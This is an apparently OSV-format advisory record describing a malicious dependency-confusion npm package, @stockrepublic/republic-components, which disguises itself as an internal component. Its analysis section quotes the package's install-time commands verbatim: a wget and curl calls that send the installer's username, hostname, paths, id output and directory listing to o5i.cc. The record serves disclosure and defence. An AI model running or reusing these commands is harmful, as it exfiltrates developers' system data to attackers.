{"id":"MAL-2026-4289","summary":"Malicious code in @stockrepublic/republic-components (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (300b309644b646817c47a283d8b9aaa018e8ae0f59986207f55fd0c39dca872a)\nThe package masquerades as an internal @stockrepublic component (version 99.0.0, description 'Runs git diff and saves the output to git.log on install') but performs no git operation. Two independent install-time exfiltration paths fire on `npm install`:\n\n1. package.json `preinstall` runs `wget --quiet \"http://o5i.cc/supp?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\"`, leaking the installer's username, working directory, and hostname over plain HTTP to o5i.cc.\n2. package.json `install` runs `node index.js`, which at index.js line 11 invokes `execSync(\"id \u003e log.txt; ls -la \u003e\u003e log.txt; hostname \u003e\u003e log.txt; curl -X POST -F file=@log.txt https://o5i.cc/supp; curl -X POST -d \\\"$(id)\\\" https://o5i.cc/supp\")`, exfiltrating uid/gid output and a directory listing of the consumer's project.\n\nThe inflated 99.0.0 version in a scoped namespace, combined with a cover-story description that does not match the code, is the canonical dependency-confusion pattern targeting an organization's private @stockrepublic registry. Any developer or CI system that pulls this public package by mistake leaks identity and filesystem metadata to attacker infrastructure.\n\n## Source: ossf-package-analysis (f5dd919316a540368ded0f9b3b7dc25a4f937373069ad4dfe1262c3b48f2949c)\nThe OpenSSF Package Analysis project identified '@stockrepublic/republic-components' @ 99.0.0 (npm) as malicious.\n\nIt is considered malicious because:\n\n- The package executes one or more commands associated with malicious behavior.\n","modified":"2026-05-26T06:02:03.562316798Z","published":"2026-05-24T19:40:37Z","database_specific":{"malicious-packages-origins":[{"import_time":"2026-05-24T21:49:24.852151634Z","source":"ossf-package-analysis","modified_time":"2026-05-24T19:53:13Z","sha256":"f5dd919316a540368ded0f9b3b7dc25a4f937373069ad4dfe1262c3b48f2949c","versions":["99.0.0"]},{"import_time":"2026-05-26T05:52:48.062718972Z","source":"amazon-inspector","modified_time":"2026-05-24T19:40:37Z","sha256":"300b309644b646817c47a283d8b9aaa018e8ae0f59986207f55fd0c39dca872a","id":"IN-MAL-2026-004539","versions":["99.0.0"]},{"import_time":"2026-05-26T05:52:48.178141461Z","source":"amazon-inspector","sha256":"cccc2f3457a8267127a9715173a83640bd4e301797fc5d4e0345f91bf924e4ac","modified_time":"2026-05-24T19:57:36Z","id":"IN-MAL-2026-004540","versions":["100.0.0"]},{"import_time":"2026-05-26T05:52:48.269952239Z","source":"amazon-inspector","sha256":"eea914c1229cc6bbc788730857e871dae1f161a0b0e1dece234e336252bd1155","modified_time":"2026-05-24T19:57:36Z","id":"IN-MAL-2026-004541","versions":["100.0.0"]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@stockrepublic/republic-components/v/99.0.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@stockrepublic/republic-components/v/100.0.0"}],"affected":[{"package":{"name":"@stockrepublic/republic-components","ecosystem":"npm","purl":"pkg:npm/%40stockrepublic%2Frepublic-components"},"versions":["99.0.0","100.0.0"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@stockrepublic/republic-components/MAL-2026-4289.json","indicators":{"domains":["o5i.cc"],"package_integrity":[{"filename":"republic-components-99.0.0.tgz","hashes":{"sha512_sri":"sha512-nDALP/7uK3Cx3uvvjUctJ+v7U/YHJQiNveN4jUhcMO59usO3f+dY0F5AsRZR1LG4v98ayKebrGIE2iEO/FBMgw==","sha1":"5b1da5c3606e5c6712cb29883dd2008c5ff189f2"}}],"evidence_files":[{"sha256":"d02146874e017458cfdec8f2cf0752a2e84853c9c64e8edd791b49349a069893","path":"package.json","tlsh":"03f0a2f89a32df232dc11f7134f18147f481bae75455ac28ddb76904c3ce881247a759"},{"sha256":"dc4af3b8f0aa13c77049bdbb6d7144fd115355d874c5788e5a5d7dc035167d89","path":"index.js","tlsh":"cb0152a3435d977492e20cd47a6f602fbd8bf3963106f9b04a7c48698bc285c40630e6"}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"},{"name":"OpenSSF: Package Analysis","contact":["https://github.com/ossf/package-analysis","https://openssf.slack.com/channels/package_analysis"],"type":"FINDER"}]}